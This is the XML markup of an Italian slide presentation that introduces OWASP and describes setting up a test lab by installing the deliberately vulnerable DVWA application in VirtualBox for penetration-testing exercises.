              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="14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10"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5795214" y="1142343"/>
            <a:ext cx="3261643" cy="4755292"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="171" name="Google Shape;171;p10"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="960700" y="1005171"/>
            <a:ext cx="4991533" cy="50296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OWASP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="177" name="Google Shape;177;p11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="492607" y="1495571"/>
            <a:ext cx="9445720" cy="4434174"/>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it-IT"/>
              <a:t>Open Web Application Security Project (chiamato semplicemente OWASP)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1280"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>https://www.owasp.org/</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1280"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Progetto open-source per la sicurezza delle applicazioni web</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1280"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Sviluppa metodologie, documentazione, tool e tecnologi e inerenti la sicurezza delle applicazioni web</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1280"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Offre guide e consigli sulla creazione di applicazioni sicure</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1280"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>OWASP Testing Guide</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1280"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>OWASP Top 10</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-251459" lvl="0" marL="342900" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="178" name="Google Shape;178;p11"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6126028" y="4921069"/>
            <a:ext cx="1935000" cy="6919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12"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="828675" y="841375"/>
            <a:ext cx="8543926" cy="4600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it-IT"/>
              <a:t>Configurazione dell’ambiente di TEST</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="189" name="Google Shape;189;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566498" y="1587934"/>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1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Istallazione della </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="it-IT"/>
              <a:t>Damn Vulnerable Web Application (DVWA) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>in VirtualBox</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>E’ un ambiente controllato in cui effettuare esercitazioni di Penetration Test di Web Application</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.dvwa.co.uk/DVWA-1.0.7.iso</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="190" name="Google Shape;190;p13"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5403272" y="3296314"/>
            <a:ext cx="2329432" cy="13156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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289407" y="470335"/>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it-IT"/>
              <a:t>Dopo aver scaricato la DVWA dal sito del produttore</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="196" name="Google Shape;196;p14"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="289407" y="1767332"/>
            <a:ext cx="9412802" cy="31833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15"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="687099" y="1543859"/>
            <a:ext cx="8596312" cy="3009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faccettatura">
  <a:themeElements>
    <a:clrScheme name="Sfaccettatur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2019-11-14T09:20:10Z</dcterms:created>
  <dc:creator>michele fredella</dc:creator>
</cp:coreProperties>
</file>